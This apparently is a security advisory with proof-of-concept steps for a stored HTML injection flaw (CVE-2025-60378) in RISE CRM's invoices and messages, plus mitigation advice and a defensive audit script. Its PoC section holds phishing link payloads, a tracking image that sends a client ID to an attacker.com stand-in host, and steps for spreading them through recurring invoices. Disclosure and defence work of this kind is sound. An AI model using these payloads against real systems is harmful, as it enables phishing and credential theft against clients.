
CVE-2025-60378 PoC — RISE Ultimate Project Manager & CRM security vulnerability

Source
Related vulnerability
Title: RISE Ultimate Project Manager & CRM security vulnerability (CVE-2025-60378)
Description: RISE Ultimate Project Manager & CRM is a project management system from the RISE company. RISE Ultimate Project Manager & CRM contains a security vulnerability that stems from authenticated users being able to inject arbitrary HTML into invoices and messages, which may lead to phishing attacks, credential theft and business email compromise.
Description
CVE-2025-60378 — Stored HTML Injection in RISE — Ultimate Project Manager & CRM < 3.9.4 (Invoices & Messaging)
Introduction
# CVE-2025-60378: Stored HTML Injection in RISE Ultimate Project Manager & CRM

> **⚠️ Security Advisory**  
> A critical Stored HTML Injection vulnerability affecting invoices, messaging, and automated communications

[![CVE](https://img.shields.io/badge/CVE-2025--60378-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60378)
[![Severity](https://img.shields.io/badge/Severity-High-orange)]()
[![CVSS](https://img.shields.io/badge/CVSS-8.1%20(High)-ff6600)]()
[![Product](https://img.shields.io/badge/Product-RISE%20CRM-blue)]()

---

## 📋 Overview

A critical Stored HTML Injection vulnerability has been discovered in RISE Ultimate Project Manager & CRM that allows authenticated users to inject malicious HTML into invoice line items, client notes, and messaging modules. This injected content persists in the database and is automatically rendered in client-facing emails, PDFs, and chat communications, enabling large-scale phishing attacks, business email compromise, and email/PDF-based malware delivery.

## 🎯 Affected Versions

- **Product:** RISE - Ultimate Project Manager & CRM
- **Vulnerable Versions:** < 3.9.4
- **Fixed Version:** 3.9.4+

## 🔍 Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-60378 |
| **Type** | Stored HTML Injection |
| **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) |
| **Attack Vector** | Network/Remote |
| **Authentication** | Required (Low Privilege) |
| **User Interaction** | None |
| **Severity** | HIGH |
| **CVSS v3.1** | 8.1 - High |
| **Discoverer** | Ajansha Shankar |

### Description

RISE CRM fails to properly sanitize and encode HTML content in multiple user-editable fields including invoices, messages, and client notes. When authenticated users inject HTML payloads into these fields, the content is stored in the database without adequate filtering. Subsequently, this malicious HTML is automatically rendered in client-facing emails, PDF attachments, and messaging/chat modules without proper escaping. Recurring invoices and automated messaging amplify the attack by distributing malicious content to multiple recipients simultaneously.

### Affected Components

- ✗ Invoice line items (description field)
- ✗ Client note/messaging module
- ✗ Chat and messaging system
- ✗ Client statement generation module
- ✗ Automated email system (recurring invoices, reminders)
- ✗ PDF attachments

### Root Cause

- ❌ Insufficient input sanitization on invoice, message, and client note fields
- ❌ Missing HTML output encoding in email templates and PDF generation
- ❌ No content validation before storing in database
- ❌ Lack of restrictions on HTML/JavaScript in client communications
- ❌ Automated systems distribute unvalidated content without additional filtering

## 💥 Impact

### Security Implications

- **🎣 Large-Scale Phishing:** Injected content can impersonate legitimate communications and redirect multiple clients to attacker-controlled sites
- **💼 Business Email Compromise:** Malicious invoices and messages sent to clients appear to come from a trusted source
- **💬 Compromised Messaging:** Malicious payloads in chat/messaging reach team members and clients directly
- **🦠 Malware Distribution:** Embedded malicious links or iframes deliver malware via email/PDF/messaging
- **🔄 Automated Attack Distribution:** Recurring invoices and automated messages ensure payload reaches multiple recipients without manual intervention
- **👥 Multi-Vector Attack:** Combined email, PDF, and messaging attack surfaces increase successful compromise rate

### CIA Triad Assessment

| Factor | Impact | Explanation |
|--------|--------|-------------|
| **Confidentiality** | 🔴 HIGH | Client credentials and sensitive data can be harvested via phishing |
| **Integrity** | 🔴 HIGH | Malicious content can modify perception of communications and business relationships |
| **Availability** | 🟡 LOW | Limited direct impact on system availability |

### Real-World Attack Scenarios

#### Scenario 1: Invoice-Based Phishing Campaign
An attacker with low-privilege project manager access creates an invoice with malicious HTML:
```html
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
```
The invoice is sent to 100+ clients via automated email. All clients receive what appears to be a legitimate invoice directing them to a phishing site. The attacker harvests credentials from multiple victims simultaneously.

#### Scenario 2: Messaging-Based Attack
An attacker injects malicious HTML into a client message:
```html
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
```
All team members and clients receive the message in their chat and may click the links, downloading malware.

#### Scenario 3: Recurring Invoice Malware Delivery
An attacker sets up a recurring invoice carrying a malware-delivery payload. Every month, clients automatically receive invoices with the embedded malicious content, giving the attacker a persistent attack vector.

## 🧪 Proof of Concept

### Environment Setup
- Access to RISE CRM admin panel with invoice/message creation permissions
- Any version prior to 3.9.4

### PoC Steps

#### Step 1: Access Invoice or Message Creation
```
Navigate to: RISE CRM Dashboard → Invoices/Messages → Create New
```

#### Step 2: Inject HTML Payload in Description/Message Field
```html
<a href="https://attacker.com">Click here to view invoice</a>
```

#### Step 3: Add Malicious Image with Redirect
```html
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
```

#### Step 4: Add Misleading Styling Payload
```html
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
```

#### Step 5: Configure Recurring Distribution
- Save the record
- Enable "Recurring" option (if available for invoices/messages)
- Set frequency (weekly, monthly, etc.)
- System automatically sends to all relevant clients

#### Step 6: Verify Attack Vector
- Check client email inbox
- Check client messaging/chat
- Open PDF attachment
- Observe malicious HTML rendered in all channels

### Expected Result
✅ Injected HTML renders in emails, PDFs, and messaging without escaping
✅ Links are clickable and redirect to attacker sites
✅ Images load from attacker-controlled servers
✅ Content persists across all future client communications
✅ Recurring distribution reaches multiple recipients automatically

## 🛡️ Mitigation

### For End Users

1. **✅ Upgrade Immediately:** Update to RISE CRM v3.9.4 or later
2. **🔍 Audit All Records:** Review recent invoices, messages, and client notes for suspicious HTML content
3. **⚠️ Client Notification:** Alert all clients if suspicious invoices or messages were sent
4. **🔄 Credential Reset:** Recommend clients change passwords if they clicked links
5. **📝 Monitor Activity:** Check audit logs for unauthorized invoice/message modifications
6. **🔐 Disable Recurring:** Temporarily disable recurring invoices/messages until patched
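As an added defender-side example (not code from this advisory or from RISE CRM), the following Python audits stored invoice line items and messages for injected markup and external link targets (mitigation step 2) and shows the output encoding that the Root Cause section identifies as missing from the email and PDF templates. The record layout, field names and allowed host are assumptions; the HTML values are the advisory's own payloads used as constructed test input.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse
# Constructed sample records (layout and field names are assumptions, not RISE CRM's
# schema); the HTML values mirror the payloads shown in this advisory.
SAMPLE_RECORDS = [
    {"id": 101, "field": "invoice_item.description", "value": "Web design, 10 hours"},
    {"id": 102, "field": "invoice_item.description",
     "value": '<a href="https://attacker.com/fake-payment">Click here to view payment status</a>'},
    {"id": 103, "field": "message.body",
     "value": '<img src="https://attacker.com/track.gif?user=CLIENT_ID">'},
    {"id": 104, "field": "message.body", "value": "Price < 100 EUR, see attached file"},
]
# Hosts that may legitimately appear in links/images (assumed: the CRM's own host).
ALLOWED_HOSTS = {"crm.example.com"}

class _TagCollector(HTMLParser):
    """Collects every tag name and every href/src target found in a stored value."""
    def __init__(self):
        super().__init__()
        self.tags, self.urls = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.urls += [v for k, v in attrs if k in ("href", "src") and v]

def find_html(value, allowed_hosts=ALLOWED_HOSTS):
    """Tags present in a stored value, plus link/image hosts not on the allow-list."""
    parser = _TagCollector()
    parser.feed(value)  # a bare '<' in text ('Price < 100') is not parsed as a tag
    findings = [f"tag:{t}" for t in parser.tags]
    for url in parser.urls:
        host = urlparse(url).hostname or ""
        if host and host not in allowed_hosts:
            findings.append(f"external-url:{host}")
    return findings

def audit_records(records, allowed_hosts=ALLOWED_HOSTS):
    """Return (id, field, findings) for every record that contains injected HTML."""
    report = []
    for rec in records:
        findings = find_html(rec["value"], allowed_hosts)
        if findings:
            report.append((rec["id"], rec["field"], findings))
    return report

def render_line_item(description):
    """Output-encode a stored description before it goes into the email/PDF HTML template."""
    return f"<td>{html.escape(description, quote=True)}</td>"
```

Running `audit_records(SAMPLE_RECORDS)` reports records 102 and 103 only; the plain-text record containing "<" is not flagged, and `render_line_item` shows the injected anchor literally instead of rendering it.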


## 📚 References

- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP: Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/)
- [OWASP: HTML Injection](https://owasp.org/www-community/attacks/HTML_Injection)
- [OWASP: Output Encoding](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding)
- [CVE-2025-60378 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60378)

## 📅 Timeline

| Date | Event |
|------|-------|
| TBD | Vulnerability discovered |
| TBD | Vendor notified |
| TBD | CVE-2025-60378 assigned |
| TBD | Patch released (v3.9.4) |
| TBD | Public disclosure |

## 👤 Credits

**Discovered by:** Ajansha Shankar

**LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/

## 📊 CVSS v3.1 Assessment

**Vector:** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N`

**Score:** 8.1 (HIGH)

**Breakdown:**
- **Attack Vector (AV:N):** Network - Can be exploited remotely
- **Attack Complexity (AC:L):** Low - No special conditions required
- **Privileges Required (PR:L):** Low - Requires authenticated user with basic project manager privileges
- **User Interaction (UI:N):** None - No user interaction needed; automated systems distribute payload
- **Scope (S:U):** Unchanged - Impact is limited to the vulnerable component
- **Confidentiality (C:H):** High - Potential credential theft via phishing to multiple clients
- **Integrity (I:H):** High - Malicious content can be injected and delivered to multiple recipients
- **Availability (A:N):** None - No impact on system availability

## 📧 Contact

For questions or additional information:
- **LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/

---

**⭐ If this research was helpful, please consider starring this repository!**

**🔔 Stay updated:** Watch this repository for updates on this and future security research.


- [CVE-2025-60374](https://github.com/ajanshashankar/CVE-2025-60374) - Stored XSS in Perfex CRM Chatbot
- [CVE-2025-55903](https://github.com/ajanshashankar/CVE-2025-55903) - Stored HTML Injection in Perfex CRM Invoices
- [CVE-2025-60375](https://github.com/ajanshashankar/CVE-2025-60375) - Authentication Bypass in Perfex CRM